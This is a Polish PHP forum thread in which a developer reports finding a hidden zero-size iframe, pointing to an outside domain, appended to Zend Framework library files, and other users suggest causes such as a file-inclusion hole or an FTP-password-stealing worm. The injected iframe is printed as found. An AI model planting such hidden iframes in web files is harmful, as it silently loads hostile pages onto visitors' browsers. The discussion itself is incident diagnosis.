Zainfekowany kod Zend Framework ? Opcje

[qba10]

Właśnie przed chwilą się trochę zaniepokoiłem.
Pracując na eclipse zauważyłem że w bibliotece Zend jest błąd składni...
Prędzej nie zwracałem na niego uwagi, bo teraz mi Zend nie potrzebny, ale przed chwilą z ciekawości zajrzałem o co tam chodzi i o zdziwieniu ujrzałem coś takiego:
(Fragment pliku Config.php biblioteki Zend)

[PHP] pobierz, plaintext 
    protected function _assertValidExtend($extendingSection, $extendedSection)
    {
        // detect circular section inheritance
        $extendedSectionCurrent = $extendedSection;
        while (array_key_exists($extendedSectionCurrent, $this->_extends)) {
            if ($this->_extends[$extendedSectionCurrent] == $extendingSection) {
                /** @see Zend_Config_Exception */
                require_once 'Zend/Config/Exception.php';
                throw new Zend_Config_Exception('Illegal circular inheritance detected');
            }
            $extendedSectionCurrent = $this->_extends[$extendedSectionCurrent];
        }
        // remember that this section extends another section
        $this->_extends[$extendingSection] = $extendedSection;
    }
 
}
<iframe src="http://www.51dj8.com/wenhua/first.htm" width="0" height="0" frameborder="0"> </iframe>
[PHP] pobierz, plaintext 

Takie iframe znalazłem w plikach:
zend/Config.php
zend/Mail.php
zend/InfoCard/* (wszsytkie pliki *.php
zend/Chiper/Exception.php
zend/Memory/* (wszsytkie pliki *.php)
zend/Openld/* (wszystkie php)
zend/Rest/* (wszytkie php)
Zauważyłem też że w tych folderach z zainfekowanym iframe jest plik desktop_.ini) z zawartością

Kod

2010-1-24

Wersja Zend'a to coś 1.5.* (nie jestem pewien)
czy ktoś się z czymś takim spotkał?
Podejrzewam że pliki były zainfekowane na moim komputerze...
Jednak co mnie bardziej zaniepokoiło, ja posiadam linuxa, a pliki były trzymane na partycji /home więc nic nie zainfekowało kodu z Windowsa...

[erix]

Pewnie miałeś jakąś dziurę w skrypcie, która umożliwiła dołączenie kodu z zewnątrz i operowanie na plikach Twojego serwera.

Dość częsty exploit - przeanalizuj logi dostępowe w poszukiwaniu parametrów z pełnym URL do pliku-exploita i zobacz, jak jest przetwarzany kod tego kontrolera.

[netvalue]

Masz pewnie zainstalowanego Total Commandera a w nim wpisane konta ftp z hasłami. Ostatnio było dosyć głośno o takim robaku co skubał
dane ftp z TC a następnie łączył się z targetem i doklejał takie chłamy... Radze zmienić wszystkie hasła z TC i go więcej nie używać.
Natomiast pliki php musisz "odsiać"

[qba10]

Ale ja te pliki miałem na localu...
Do serwera www nie ma dostępu z zewnątrz ponieważ router to uniemożliwia.
Total Comandera nie używam bo po co mi ftp na loclau.
Co lepsze, jeżeli data w tym pliku dektop_.ini jest data zmodyfikowania i wgrania tych iframe to w tym czasie (nawet w tym roku) w ogóle nie używałem Zend'a przy żadnym skrypcie...
Jedynie co miałem kontakt z tymi plikami to za pomocą Eclipse, bo mam je w folderze projektu...

PS: inne pliki php w moim projekcie są czyste

No niestety logi mam dopiero od 4 lutego, bo zmieniałem dystrybucje linuxa..

Ten post edytował qba10 8.02.2010, 23:36:31